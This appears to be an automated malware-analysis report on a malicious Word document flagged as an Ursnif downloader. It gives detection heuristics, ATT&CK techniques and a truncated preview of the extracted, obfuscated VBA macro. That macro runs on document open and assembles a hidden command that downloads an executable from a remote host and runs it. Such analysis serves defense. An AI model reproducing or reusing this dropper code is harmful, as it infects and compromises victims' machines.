MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used by the 'Document_open' macro to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this behavior. The embedded URL 'http://schemas.openxmlformats.org/drawingml/2006/main' was confirmed benign and is likely a false positive or part of the document structure.
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4951 bytes |
SHA-256: 1163b3d0006f1f9be5d9c1261fe932c5be7fe6ff46f173df2a46393486475479 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UCDiRpWFPmBlbz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
VarType "9795" + "hK"
VarType "iMwAUzCR" + "124164705"
VarType "453346350" + "N" + "Q" + "4131"
Shell fUwqmrdF + nquuwpidPRr, Format(vbHide)
VarType "ajJz" + "OUWHUC"
VarType "jHK" + "1645" + "aXbd" + "urLtswE"
End Sub
Attribute VB_Name = "lYWHbkt"
Function fUwqmrdF()
On _
Error _
Resume _
Next
VarType "r" + "6468"
VarType "8554" + "309009182"
qniUmPdIUS = Format(Chr(12 + 4 + 0 + 7 + 76)) + "m" + "d " + "/V" + "/" + Format(Chr(8 + 2 + 0 + 5 + 52)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "s^e^" + "t y^i" + "^" + "p= ^ " + "^ ^ ^" + " " + " ^ ^"
VarType "A" + "KdzIjVa" + "L" + "ziw"
VarType "2755" + "6731" + "6367" + "QRwiiwpQr"
VarType "VarwSQTvQ" + "356158450" + "ZDt" + "2824"
wzjIK = " " + " ^" + " ^ ^}^}" + "{^h" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "ta" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "}^;" + "^ka^erb" + ";jr" + "^E$^" + " me^tI-" + "ekovn^I"
VarType "YXpEQ" + "GDUNRNun"
VarType "1607" + "TS" + "160521667" + "235791919"
VarType "rq" + "irkf"
VarType "5849" + "MIASGi" + "OiHz" + "QDruGi"
YwivHGpw = ";)^jr^" + "E" + "$^" + " ^,jH" + "^A$(e"
VarType "491799933" + "XXz"
VarType "sYM" + "1537" + "201128571" + "zzr"
VarType "Wjj" + "bqoJiw"
VarType "NWu" + "AzDV" + "8342" + "YRBM"
VarType "206998428" + "6523" + "NpBYlz" + "FWFlKsQjjRD"
OYpWi = "l^" + "i" + "^" + "F^da^ol" + "nwo" + "^D." + Format(Chr(8 + 2 + 0 + 5 + 52)) + "N^q^$" + "^{^y" + "rt{)h" + "tj^$^ " + "ni" + " ^j^H^"
VarType "AszS" + "Idji"
VarType "T" + "3109"
VarType "nAj" + "caO"
TpFMm = "A^$(^h" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "a^er" + "^o" + "f;" + "'e" + "^xe.^'^" + "+^J^Xr^" + "$+^'^" + "\" + "'+" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "^i^" + "l^bup^:" + "vn^e$=^"
fUwqmrdF = qniUmPdIUS + wzjIK + YwivHGpw + OYpWi + TpFMm
VarType "LbaaCfCFQAQoc" + "vF" + "olI" + "67950561"
VarType "6252" + "134911265"
VarType "9339" + "T"
VarType "vOJ" + "o" + "462999029" + "4770"
End Function
Function nquuwpidPRr()
On _
Error _
Resume _
Next
VarType "141138532" + "427439284"
VarType "376656094" + "516740597" + "RPtrcTtQ" + "XFwUhp"
VarType "wff" + "D"
nLdddl = "jrE$^;^" + "'" + "2^65^'" + " ^" + "=^ J^X" + "r$^" + ";" + ")" + "^'@^'"
VarType "4591" + "c" + "saQW" + "GO"
VarType "XILOzpBP" + "118359393" + "4105" + "CzkUGfqoVOwGr"
VarType "fLscOdvaTIwWs" + "IwTsz" + "506876850" + "385060028"
VarType "28348501" + "91404210"
ASzCUlSj = "(" + "^t^" + "i" + "l^p^S^" + ".^'nk" + "^t^.4" + "agr" + "at^=" + "^" + "l^?"
VarType "TU" + "kDtBdqhsA"
VarType "YTkfkkAtVf" + "388465826" + "HY" + "89432268"
VarType "266393549" + "CzHW"
VarType "DHZiuRz" + "185781960" + "500302257" + "vmu"
QvCuAZl = "^ph^p" + "^.^t" + "^o" + "^ksn^" + "apo/^T" + "TR/mo" + Format(Chr(12 + 4 + 0 + 7 + 76)) + ".^zwuz" + "^w8o" + "^9" + "dv" + "^454v//" + ":ptt" + "^h'^"
VarType "aHbi" + "424609821"
VarType "Y" + "163881480"
iRitfibjI = "=h" + "t" + "j" + "^$;" + "tne^i^" + "l" + Format(Chr(8 + 2 + 0 + 5 + 52)) + "^"
VarType "Lp" + "6348"
VarType "395543271" + "8456" + "25305375" + "504431308"
VarType "jEZwTTw" + "Eqna" + "1229" + "Si"
VarType "Pnz" + "ZjQ"
TtdrbIdzH = "b^eW." + "^t" + "eN^ t" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "^" + "ej" + "b^o-w" + "en^"
VarType "260935029" + "162052099" + "nwpsAo" + "qZPuS"
VarType "103603013" + "YspBXX" + "wTplBmtPEi" + "wuj"
VarType "233202158" + "6336"
ssIjdE = "=" + Format(Chr(8 + 2 + 0 + 5 + 52)) + "Nq$" + "^ ^l^" + "le^" + "hsre"
VarType "AAobUhTwq" + "AGzBiaVhJ"
VarType "8069" + "4951" + "506410857" + "z"
VarType "194169166" + "ZX" + "CQ" + "V"
uSBOJpHrz = "w^" + "o^p&&^f" + "^or" + " /" + "^L " + "%^u ^i" + "n (2" + "6^5^,^
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.